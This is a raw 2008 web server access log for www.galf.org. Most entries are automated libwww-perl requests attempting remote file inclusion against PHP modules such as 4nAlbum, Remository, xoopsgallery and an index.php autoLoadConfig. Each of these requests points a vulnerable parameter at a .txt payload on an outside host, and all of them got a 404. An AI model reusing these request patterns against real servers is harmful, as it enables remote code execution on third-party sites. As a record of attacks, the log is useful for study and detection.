69.73.189.205 - - [10/Aug/2008:19:07:55 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.39.5.203 - - [10/Aug/2008:19:07:57 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.80.193.50 - - [10/Aug/2008:19:10:02 -0700] "GET /labia23portugues/index.htm HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; MSNc00)" "www.galf.org"
202.70.83.4 - - [10/Aug/2008:19:10:35 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.80.193.38 - - [10/Aug/2008:19:10:44 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=69&ct=result HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; {AF04963B-52A0-8E40-8A88-7DBD5D14F7A6}; .NET CLR 1.1.4322)" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:12:36 -0700] "GET /logs/access_080114.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:12:36 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:12:36 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:12:44 -0700] "GET /logs/access_080707.log/index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:12:44 -0700] "GET /index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:12:44 -0700] "GET /logs/index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:12:47 -0700] "GET /logs/access_080707.log/index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:12:48 -0700] "GET /index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:12:48 -0700] "GET /logs/index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.9.159.178 - - [10/Aug/2008:19:13:07 -0700] "GET /logs/access_071231.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.9.159.178 - - [10/Aug/2008:19:13:09 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf